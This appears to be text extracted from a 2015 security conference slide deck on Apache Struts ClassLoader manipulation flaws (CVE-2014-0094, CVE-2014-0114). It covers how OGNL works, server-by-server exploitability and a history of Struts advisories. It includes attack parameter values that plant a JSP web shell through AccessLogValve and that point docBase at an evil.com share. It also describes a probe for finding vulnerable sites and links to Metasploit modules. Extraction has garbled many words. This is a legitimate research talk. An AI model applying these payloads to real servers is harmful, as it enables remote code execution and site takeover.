¿Apache Struts?
Java framework
– for Java webapps
– Two major versions • Struts 1.x (EoL since 2013) • Struts 2.x
Why Struts?
• (Mar 2014) CVE-‐2014-‐0094 goes public
• What the hell was it? – Struts 2 vulnerability – UnauthenVcated – All versions affected – Could lead to RCE
CVE-‐2014-‐0094 “ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulaVon” • Credits: – Peter Magnusson – Przemysław Celej
• A^er reading it… – Let’s go learning some basics
OGNL Object Graph NavigaVon Language • Expression Language for gedng and sedng properVes of Java objects – Objects that are stored in the Context
top
OGNL #foo.dummy // foo.getDummy() #bar.dummy // bar.getDummy() dummy // qux.getDummy() dummy = “RootedCON” // qux.setDummy(“RootedCON”)
foo bar baz qux
Context
root
foo bar qux ….
Struts2 OGNL Context (AcDonContext)
ValueStack
Struts 2 request processing
1
7
Filter Dispatcher Interceptors
AcVon
Result
/example/hello.acDon
HTML
1
7
User
2 3
4
56
hMp://struts.example.com/example/hello.acDon
HTML
ParametersInterceptor
Struts2 app
ParametersInterceptor “This interceptor gets all parameters from AcVonContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)”
“Because parameter names are effecDvely OGNL statements, it is important that security be taken into account”
hpp://struts.apache.org/release/2.0.x/struts2-‐core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html
Available methods Methods that can be reached – As seen, OGNL allows us to reference gepers and sepers
execute() getUsername() setUsername()
HelloWorldAcDon
?
AcDonSupport EXTENDS
Available methods Methods that can be reached – As seen, OGNL allows us to reference gepers and sepers
execute() getUsername() setUsername()
HelloWorldAcDon …
getErrors() getTexts()
getFieldErrors() getAcDonErrors()
getAcDonMessages() getErrorMessages()
…
AcDonSupport EXTENDS
Available methods Methods that can be reached – As seen, OGNL allows us to reference gepers and sepers
execute() getUsername() setUsername()
HelloWorldAcDon
… getErrors() getTexts()
getFieldErrors() getAcDonErrors()
getAcDonMessages() getErrorMessages()
…
AcDonSupport EXTENDS
… getClass()
…
Object EXTENDS
NavigaVng objects • Parameters are evaluated iteraVvely as an AST chain, composed by – A chain of gepers (without parameters) – Ending with a seper (1 String, boolean or int parameter)
Looking for sepers • Through object navigaVon reach several seper methods not part of the AcVon can be reached – What methods?
• Post published by neobyte hpp://sec.baidu.com/index.php?research/detail/id/18 1. PoC for gedng reachable sepers
2. A method for gedng RCE on Tomcat 8
DEMO
Struts Tester on Tomcat 6 / 7 & Tomcat 8
customized & commented version ready to use
hpps://github.com/julianvilas/rooted2k15
Exploitability Tested against: • Tomcat 6 / 7 à RCE via “docBase” (win only) • Tomcat 8 à RCE via “AccessLogValve” • Glassfish 4 à RCE via “docBase” (win only) • Websphere 8.5 (developer) à RCE not found • Weblogic 10 & 12 à RCE not found • JBOSS 7.1 & 7.4 à RCE not found
What about Struts 1 • According to CVE-‐2014-‐0114, Struts 1 is also vulnerable
• Unpatched! (struts 1 is over EoL, but is sVll in use) • Different reason: Struts 1 no OGNL nor Value Stack – The key: bean populaVon with BeanUVls
• You can find some Alvaro Muñoz (@pwntester) gold, like
further explanaVon and a filter to be applied as a workaround, at – hpp://h30499.www3.hp.com/t5/HP-‐Security-‐Research-‐Blog/Protect-‐your-‐
Struts1-‐applicaVons/ba-‐p/6463188#.VBMB0i5_s0z – hpp://h30499.www3.hp.com/t5/HP-‐Security-‐Research-‐Blog/Update-‐your-‐
Struts-‐1-‐ClassLoader-‐manipulaVon-‐filters/ba-‐p/6639204#.VOsFG7CG_8Q
AccessLogValve exploitaVon
A log file with name shell1.jsp is created at webapps/ROOT. When requesVng a inexistent URL, it’s logged into the log file (that it’s going to be interpreted as a JSP when get accessed).
.directory=webapps/ROOT
.prefix=shell
.suffix=.jsp
.fileDateFormat=1
1
2
3
4
DEMO
AccessLogValve exploitaVon
hpps://github.com/rapid7/metasploit-‐framework/blob/master/modules/exploits/
mulV/hpp/struts_code_exec_classloader.rb
docBase exploitaVon • “The Document Base (also known as the Context Root) directory for this web applicaVon, or the pathname to the web applicaDon archive file (if this web applicaVon is being executed directly from the WAR file).”
• Legit applicaVon goes down
.docBase=//evil.com/shared
About metasploit module • Tomcat 6/7 & GlassFish (docBase)
– Only Win – Not landed yet in trunk but works fine
– Maphew Hall (0x41414141) pull requests: hpps://github.com/rapid7/metasploit-‐framework/pull/3074 hpps://github.com/rapid7/metasploit-‐framework/pull/3075 hpps://github.com/rapid7/metasploit-‐framework/pull/3323
– Same module than before, landed yesterday night
Searching Struts sites • Dumb detecVon of Struts 2 sites
– Default extension for Struts 2: “.acVon” • Also, when default configured, it accepts both “.acVon” and no extension
Searching Struts sites
hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/java/struts/sites.html
Vulnerability checking • To check if a Struts 2 site is vulnerable, modify
“cacheMaxSize” property – Integer.MAX_VALUE == 2147483647 (in x86)
• Tomcat 6/7 & Glassfish
• Tomcat 8
2147483647
2147483648
AAAAAAAAA
Vulnerability checking • In Struts 1 if the conversion String to Integer fails a default value 0 is set
• But when trying to set a method that receives an Object with a String, a excepVon is raised
ROOTEDCON
Previous security bulleVns
RCE, when form validaDon fails field values are interpreted as OGNL
RCE, bypass the '#'-‐usage protecDon built into the ParametersInterceptor to execute OGNL
RCE, bypass the '#'-‐usage protecDon built into the ParametersInterceptor to execute OGNL ! S2-‐003 fix was incomplete
RCE, user’s input is evaluated as OGNL when there’s a conversion error
Several RCE: via ExcepDonDelegator (same as S2-‐007), CookieInterceptor (same idea than S2-‐003 and S2-‐005), etc.
RCE, incomplete fix for S2-‐003 and S2-‐005 on ParametersInterceptor
Previous security bulleVns
RCE, incomplete fix for S2-‐003, S2-‐005 and S2-‐009 on ParametersInterceptor when using values for redirecDons
RCE, s:url and s:a tags, when "includeParams" is set, allow evaluaDng the values of request parameters as OGNL.
RCE, same than S2-‐013, incomplete fix.
RCE, acDons using wildcards and Double OGNL evaluaDon allow OGNL injecDon
RCE: DefaultAcDonMapper short-‐circuit navigaDon interpreted as OGNL
RCE, what we saw in this presentaDon ☺ (ParametersInterceptor)
RCE, Incomplete fix for S2-‐020
Incomplete fix for S2-‐020 and S2-‐021
Conclusions? • Seven years from between S2-‐001 and S2-‐020
• Same kind of vulnerabiliVes: injecDng OGNL from user-‐supplied data
• Several bypasses for fixes
• Almost all RCE • Take your own…
Bonus track -‐ Confluence • Is based on a WebWork fork (previous than Struts 2)
• If you look their bulleVns
– Versions up to and including 5.5.1 vulnerable to ClassLoader manipulaDon hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-‐05-‐21
– Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluaDon hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-‐+2015-‐01-‐21
• Don’t they look familiar? J